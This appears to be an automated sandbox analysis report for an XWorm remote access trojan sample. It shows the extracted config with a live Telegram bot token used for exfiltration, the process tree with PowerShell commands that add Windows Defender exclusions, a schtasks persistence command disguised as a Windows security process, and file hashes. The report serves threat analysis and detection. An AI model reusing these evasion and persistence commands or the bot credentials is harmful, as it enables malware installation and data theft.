xworm | hxxps://gofile[.]io/d/I9TkTr

General

Target

https://gofile.io/d/I9TkTr

Score

10^/10

xworm defense_evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

8FOrSv7acU4WvJEw

Attributes

Install_directory
%Temp%
install_file
SecurityHealthSystray.exe
telegram
https://api.telegram.org/bot7861906100:AAH9rFpuZiA3Te0aLnARADYSdZg0z81wpUs/sendMessage?chat_id=6019303946

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002afbe-4.dat	family_xworm
behavioral1/memory/2060-6-0x00000000009C0000-0x00000000009D2000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe
3460	powershell.exe
716	powershell.exe
4480	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.lnk	XClient.exe

Executes dropped EXE 2 IoCs

pid	Process
2060	XClient.exe
400	SecurityHealthSystray.exe

Loads dropped DLL 1 IoCs

pid	Process
2060	XClient.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SecurityHealthSystray.exe"	XClient.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XClient.exe:Zone.Identifier	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XClient.exe:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
460	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2060	XClient.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
716	powershell.exe
716	powershell.exe
716	powershell.exe
2060	XClient.exe
2060	XClient.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	XClient.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	716	powershell.exe
Token: SeDebugPrivilege	2060	XClient.exe
Token: SeDebugPrivilege	400	SecurityHealthSystray.exe
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2060	XClient.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 4480	2060	XClient.exe	102
PID 2060 wrote to memory of 4480	2060	XClient.exe	102
PID 2060 wrote to memory of 4784	2060	XClient.exe	104
PID 2060 wrote to memory of 4784	2060	XClient.exe	104
PID 2060 wrote to memory of 3460	2060	XClient.exe	106
PID 2060 wrote to memory of 3460	2060	XClient.exe	106
PID 2060 wrote to memory of 716	2060	XClient.exe	108
PID 2060 wrote to memory of 716	2060	XClient.exe	108
PID 2060 wrote to memory of 460	2060	XClient.exe	110
PID 2060 wrote to memory of 460	2060	XClient.exe	110
PID 2060 wrote to memory of 2108	2060	XClient.exe	115
PID 2060 wrote to memory of 2108	2060	XClient.exe	115
PID 2108 wrote to memory of 3448	2108	powershell.exe	117
PID 2108 wrote to memory of 3448	2108	powershell.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/I9TkTr
1⤵
PID:3540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --always-read-main-dll --field-trial-handle=4036,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:1
1⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --always-read-main-dll --field-trial-handle=4072,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1
1⤵
PID:1212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --always-read-main-dll --field-trial-handle=5564,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1
1⤵
PID:3052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5584,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=5660 /prefetch:14
1⤵
PID:1052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=5580,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=5676 /prefetch:14
1⤵
PID:1056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6132,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:1
1⤵
PID:4052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --always-read-main-dll --field-trial-handle=5176,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=3840 /prefetch:1
1⤵
PID:1740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6392,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6552 /prefetch:1
1⤵
PID:1592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --string-annotations --always-read-main-dll --field-trial-handle=6536,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:14
1⤵
PID:768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6508,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:1
1⤵
PID:936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --string-annotations --always-read-main-dll --field-trial-handle=6512,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:14
1⤵
PID:2580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=6040,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:14
1⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2452

C:\Users\Admin\Downloads\XClient.exe
"C:\Users\Admin\Downloads\XClient.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SecurityHealthSystray.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:716
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SecurityHealthSystray" /tr "C:\Users\Admin\AppData\Local\Temp\SecurityHealthSystray.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
    3⤵
    PID:3448

C:\Users\Admin\AppData\Local\Temp\SecurityHealthSystray.exe
C:\Users\Admin\AppData\Local\Temp\SecurityHealthSystray.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5468,i,11614662984397188522,10052431758593679358,262144 --variations-seed-version --mojo-platform-channel-handle=6084 /prefetch:14
1⤵
PID:2716

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

SIP and Trust Provider Hijacking

1

T1553.003

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
39f275549f523222efba91bbfeedd021

SHA1
7e48c021b1e7b7c81b9a3b6b5cc1b220606e5731

SHA256
a0072f885bdd0063b2415b0aa78d2228348ead9a89b307032cbba01894d5f3cd

SHA512
3a0495982e447b14574f565c4756e4fe8a853543d5c791755f04de805f956f8a16109712a71b309d7ff4cd8385bffcbb40fceb054f59b7d742d7d9ed776d44f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6f0e62045515b66d0a0105abc22dbf19

SHA1
894d685122f3f3c9a3457df2f0b12b0e851b394c

SHA256
529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

SHA512
f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3ac102a242951c2d9c84955d39a30a76

SHA1
d85b46ddcb8a895a384c5399d7de95bb9eba8446

SHA256
c8909b2b4a5366f114b25f4c514ab5faea6d1f61b3cbdcf3f1f2336d7b76a54c

SHA512
8d798c9751c7337907352795b4c831f05da1f3fd966eec5b771f661ec3b59c3f706f90a7d1484763a9b2ba363672927847ebf5cb85f4785683d7abefbea50111

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
85a856d138f6fec5b2d64d1b6658a61e

SHA1
a42398c085485601e3fc915f2d0c2fbd7046ad55

SHA256
737694fb0ef78d16514fe65ec4013400f3ceaa54c1e63121a228247d5cd2b3bf

SHA512
dd9b92f6bb47e7e9b927ff7d2d39aef4427b2574eed365b1f4e5944093377791742b08d5b726c76f5c47231985346541d149b4c59320193ebc7d83775a36f3f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_desx0ucx.4ur.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4901.tmp

Filesize
100KB

MD5
1b942faa8e8b1008a8c3c1004ba57349

SHA1
cd99977f6c1819b12b33240b784ca816dfe2cb91

SHA256
555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc

SHA512
5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43

Download Submit
C:\Users\Admin\Downloads\XClient.exe

Filesize
43KB

MD5
666ecdd8ffb5c0eb34fa6fde17376d5d

SHA1
948568e798cd9e77a40b1c1cb82d80649733477f

SHA256
5e50443c2159772232481aeeb05d17345f934e3330979cd09ad088c2a9344893

SHA512
7d6e10a111b432bb86cd1b0fabe2a05711c00235af9dc11888b60f5e853215a8245378324b975ad271cfdbccb99388157e09d62756c10881dcd2264329679c81

Download Submit
memory/2060-61-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download
memory/2060-57-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download
memory/2060-58-0x00007FFBE6C93000-0x00007FFBE6C95000-memory.dmp

Filesize
8KB

Download
memory/2060-63-0x000000001D400000-0x000000001D43A000-memory.dmp

Filesize
232KB

Download
memory/2060-6-0x00000000009C0000-0x00000000009D2000-memory.dmp

Filesize
72KB

Download
memory/2060-69-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/2060-5-0x00007FFBE6C93000-0x00007FFBE6C95000-memory.dmp

Filesize
8KB

Download
memory/4480-21-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download
memory/4480-18-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download
memory/4480-17-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download
memory/4480-16-0x00000234F7490000-0x00000234F74B2000-memory.dmp

Filesize
136KB

Download
memory/4480-15-0x00007FFBE6C90000-0x00007FFBE7752000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads